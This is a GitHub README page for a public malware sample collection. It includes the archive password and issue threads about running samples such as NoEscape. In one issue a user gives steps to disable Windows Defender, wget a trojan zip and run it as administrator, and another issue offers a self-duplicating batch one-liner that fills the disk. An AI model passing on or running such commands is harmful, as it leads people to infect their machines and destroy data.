This repository is one of a few malware collections on GitHub.

Overview

Malware Database

Disclaimer

This repository is one of the few malware collections on GitHub. Almost every sample here is malicious, so I strongly recommend that you neither open these files on real hardware nor misuse the malware to prank your friends. Playing with these samples may lead to irreversible consequences, which may affect anything from personal data to passwords and banking information.

I am not responsible for any damage caused by the malware inside my repository and your negligence in general.

Table of contents

  1. Introduction
  2. Contributors
  3. About
  4. FAQ

Introduction

Most people say: "Malware isn't a toy to play with!"; however, I don't hold such an opinion. Malware is fun, if you know how to play with it! 😉 In my opinion, people who think the opposite are gloomy and tedious or just afraid of it. Nonetheless, I still DO NOT recommend using malware for your personal needs and benefits. If you want to ask any type of question (e.g. Archive password doesn't match; Provided malware doesn't work! etc.), use the "Issues" tab. Also here are the steps if you want to support me and my repository!

Any type of support will be highly appreciated!

Contributors

This is a list of people who really helped me (excluding myself):

About

My malware repository isn't excellent, however, I am trying my best to convince you 😄

Password

The password for all archives is mysubsarethebest!

Percentage

Here is a table of the approximate percentage of each malware type in my repository.

Malware type               Percentage
-------------------------  ----------
Rogue (Fraud)              40%
Joke                       35%
Trojan                     10%
Ransomware                 10%
Self-made / Viewer-made    5%

FAQ

Here you can find answers to frequently asked questions. This may be helpful!

Q: What is the password for the archive I've downloaded?
A: It is mysubsarethebest... Read the description carefully!

Q: I know I didn't misspell the password for the archive, however it STILL won't unlock. What do I do?
A: Check for mistakes again. If that doesn't help, create an issue and I will reupload the one you're struggling with. Mistakes can happen!

Q: I can't find the sample I need which you reviewed on your channel, why?
A: I am happy to announce the malware series are back, although I cannot guarantee the presence of every sample reviewed on my channel. Create an issue if you don't find a sample you really want, I (or my moderator) will help you shortly after. But please, please don't spam with your requests in issues. Send them to my mailbox. (mentioned in the 4th question)

Q: Can I contribute to your malware database? If yes, how?
A: Yes, of course you can. You can send your malware (no batch or bat2exe files, please) to my mailbox! ([email protected]) Only the best of the best will be reviewed and put here.

Endermanch, 2020

Comments
  • Please help me with my son's iPhone :(

    Hey, my son downloaded or clicked a URL with his iPhone. Now he has this "noescape" virus on his iPhone. He can't uninstall this app; in WhatsApp his profile picture and status changed to noescape pictures. How can we delete this virus? Please help me, he is a kid :(

    Now the virus says the iPhone's boot sector will be deleted in 10 minutes, and the system apps changed to noescape.

    In WhatsApp this virus shared a link to this site, so I think you can help me please?

    opened by Helpmysonplease 34
  • NoEscape.exe payloads not working

    I wanted to try to run NoEscape.exe in a VM and try to recover from its September 18th payload.

    So I changed the date to September 18th and rebooted. But after the VM booted back up and I opened a program like 7-Zip, I didn't see notepad open up and threaten me, but 7-Zip opened. I tried this with different programs and years. Nothing worked.

    Here are my VM specs:

    • Hypervisor: VirtualBox (Don't insult me, VMware costs 200 US dollars. Plus I am more comfortable with VBox)
    • Guest OS: Windows 10 Home 2004 64-bit
    • Guest RAM: 4 GB
    • Guest CPU core count: 4
    • EFI: Enabled

    Can anyone explain to me what's going on and/or how to fix it?

    opened by BSOD-Master 21
  • NoEscape.exe Error - Please Help!

    Hello, I'm having a problem when attempting to execute NoEscape in a VM. First, it said that I need VCRUNTIME140.dll, so I found a copy of it and put it on the desktop. Then that error went away, but I got another one saying "The application was unable to start correctly (0xc000007b). Click OK to close the application.". I tried reinstalling Microsoft Visual C++ and .NET 5 and nothing has fixed the problem. Please Help! Btw I'm running the latest version of Windows 10 available on Enderman's website.

    opened by windoze11 19
  • CLOSED || Launcher Idea

    this was a stupid idea by me, a launcher of malware with all the samples || closed this bc its boring getting replies with: What? DIY, wdym.... // done.

    opened by vpty 17
  • NoEscape error

    Every time I try to open Noescape, it says, "The code execution cannot proceed because VCRUNTIME140.dll was not found. Reinstalling the program may fix this program." I know for a fact I have VCRUNTIME140.dll installed, and I reinstalled NoEscape 3 times. PLEASE HELP!

    opened by vaughhnn 12
  • OK, Trojan Virus here!

    File: Trojan Download what? about the "virus detected" message, download this using command prompt WGet. or use edge but disable windows defender first. go to https://github.com/webfolderio/wget-windows/releases/tag/1.21.1 and download both zip files with binary type mkdir %userprofile%\VirusFolder type cd %userprofile%\VirusFolder extract the WGet zipped contents to the same folder as the virus download, else it won't work type wget https://github.com/Endermanch/MalwareDatabase/files/6709864/Virus-v2.0.zip unzip the file and run it and make sure to run as administrator here or it won't work please ignore the icon i promise it is not a BAT2EXE or a batch file!!!!!!!!!!!!!!!!!!!! and run it in compatibility mode for windows make sure to go into Defender and right click the virus then "allow item" first before extracting

    opened by IAW9927 11
  • Please close this Endermanch

    Will NoEscape still persist if I reinstall Windows? Or does the virus let me reinstall during the Sep18 payload? If not, will the problem be fixed if I send my computer to Microsoft?

    opened by LarryZhaoatGmail 9
  • Add the 'Dupe' virus

    Hi Enderman, a virus that I'd like to submit to the user-submitted viruses!

    Here's the prospect:

    • Windows 10, a large amount of disk space (or even just ya average laptop's disk space)
    • Batch file in a hidden corner of the disk (maybe in Windows so no-one deletes it)
    • Gets called at startup (maybe something in startup folder that invokes it)

    The unsuspecting user would not know what to do as his/her disk space just keeps on getting bigger and bigger as this virus basically just duplicates itself (so it multiplies its size by 2x every iteration, thus making your disk space run out really quickly)!

    This virus works on nearly any version of Windows, starting from Windows 95 (and possibly even Windows 3). A shorter version of the virus (which can run on 99.9% of DOS shells, however old or new, regardless of brand) can be achieved by using the following for virus.bat (it's a one-liner!):

    type virus.bat >> virus.bat
    
    
    opened by James-Livesey 9
  • Can no escape spread via lan

    I wanted to know if no escape.exe can spread via LAN, because I wanted to try it out in a VM if it's disconnected from the internet. If so, can it infect my host OS? I only ask because I wanted to try it.

    opened by Totally-A-Boar 8
  • How do I get ddom.py working?

    So I did what you did on your fake download button video (I downloaded the file and modules from the original poster), and when I try and run it on command prompt it says "No module named requests." Please help (I'm writing this on my host computer, The files are on a virtual machine.)

    opened by EggbertCentral 6
  • Meta Virus (Testing Phases)

    New Virus! (site removed due to google getting mad at me) (only use if you need to! and the GitHub download is available in the site listed.) Please send me info if it doesn't work, it is still in testing phases and you can edit it as you wish, but if you do please send me a copy of the edited meta virus, and name it Meta-Virus-Ender-Edition, This will make sure I can recognize Meta Virus.zip it!

    opened by MetaMysteries8 2
  • MalwareBazaar by abuse.ch

    MalwareBazaar is a public malware database with tons of samples. You can reach it at https://bazaar.abuse.ch/ My request is: implement malwarebazaar to daily dose of malware please? Thanks

    API Docs: https://bazaar.abuse.ch/api/#download

    opened by Vichingo455 0
  • Upload Setup_201

    Hello,

    I was wondering if uploading the Setup_201.exe file from --> this <-- video would be possible. I really want to play around with it, but I can't seem to generate it myself on the malware generator site.

    Thanks!

    opened by ThatDumbPan 0
Owner
Andrew
I'm just a youtuber :)
Malware-analysis-writeups - Some of my Malware Analysis writeups

About This repo contains some malware analysis writeups i've created over time m

Itay Migdal 14 Jun 22, 2022
script that pulls cve collections from NVD.NIST.GOV.

# cvepull.py #script that pulls cve collections from NVD.NIST.GOV. #edit line 17 (timedelta) number to change the amount of days to search backwards

Aaron W 1 Dec 18, 2021
A small utility to deal with malware embedded hashes.

Uchihash is a small utility that can save malware analysts the time of dealing with embedded hash values used for various things such as: Dyn

Abdallah Elshinbary 48 Dec 19, 2022
Malware Configuration And Payload Extraction

CAPEv2 (Python3) has now been released CAPEv2 With the imminent end-of-life for Python 2 (January 1 2020), CAPEv1 will be phased out. Please upgrade t

Context Information Security 701 Dec 27, 2022
Malware Configuration And Payload Extraction

CAPE: Malware Configuration And Payload Extraction CAPE is a malware sandbox. It is derived from Cuckoo and is designed to automate the process of mal

Kevin O'Reilly 1k Dec 30, 2022
Android Malware Behavior Deleter

Android Malware Behavior Deleter UDcide UDcide is a tool that provides alternative way to deal with Android malware. We help you to detect and remove

null 27 Sep 23, 2022
A Feature Rich Modular Malware Configuration Extraction Utility for MalDuck

Malware Configuration Extractor A Malware Configuration Extraction Tool and Modules for MalDuck This project is FREE as in FREE, use it commercial

c3rb3ru5 103 Dec 18, 2022
An IDA pro python script to decrypt Qbot malware string

Qbot-Strings-Decrypter An IDA pro python script to decrypt Qbot malware strings.

stuckinvim 6 Sep 1, 2022
Discord Token Stealer Malware Protection

TokenGuard TokenGuard, protect your account, prevent token steal. Totally free and open source Discord Server: https://discord.gg/EmwfaGuBE8 Source Co

null 10 Nov 23, 2022
A way to analyse how malware and/or goodware samples vary from each other using Shannon Entropy, Hausdorff Distance and Jaro-Winkler Distance

A way to analyse how malware and/or goodware samples vary from each other using Shannon Entropy, Hausdorff Distance and Jaro-Winkler Distance

null 11 Nov 15, 2022
Android Malware (Analysis | Scoring) System

An Obfuscation-Neglect Android Malware Scoring System Quark-Engine is also bundled with Kali Linux, BlackArch. A trust-worthy, practical tool that's r

Quark-Engine 1k Jan 4, 2023
A guide to building basic malware in Python by implementing a keylogger application

Keylogger-Malware-Project A guide to building basic malware in Python by implementing a keylogger application. If you want even more detail on the Pro

Noah Davis 1 Jan 11, 2022
A malware to encrypt all the .txt and .jpg files in target computer using RSA algorithms

A malware to encrypt all the .txt and .jpg files in target computer using RSA algorithms. Change the background image of targets' computer, and decrypt the targets' encrypted files in our own computer

Li Ka Lok 2 Dec 2, 2022
Detection tool of malware(s) by checksum (useful for forensic)

malware_checker.py Detection tool of malware(s) by checksum (useful for forensic) Dependencies installation $ pip3 install -r requirements.txt

Fayred 1 Jan 30, 2022
Huskee: Malware made in Python for Educational purposes

Features: Discord Token Grabber Wifi Passwords Grabber Googl

chew 4 Aug 17, 2022
This repo is about steps to create an effective custom wordlist in a few clicks/

Custom Wordlist This repo is about steps to take in order to create an effective custom wordlist in a few clicks. This comes in handy in pentesting enga

null 2 Oct 8, 2022
PoC of proxylogon chain SSRF(CVE-2021-26855) to write file by testanull, censored by github

CVE-2021-26855 PoC of proxylogon chain SSRF(CVE-2021-26855) to write file by testanull, censored by github Why does github remove this exploit because

The Hacker's Choice 58 Nov 15, 2022
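Aggregates PoCs or exploits already on GitHub; CVE information comes from the official CVE website. Auto Collect Poc Or CVE from Github by CVE ID.

PocOrExp in Github Aggregates PoCs or exploits already on GitHub; CVE information comes from the official CVE website. Note: aggregation is only by generic CVE number, so for vulnerabilities with Windows identifiers such as MS17-010, and for well-known vulnerabilities with nicknames, it is better to search for them yourself. Usage python3 exp.py -h usage: ex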

null 567 Dec 30, 2022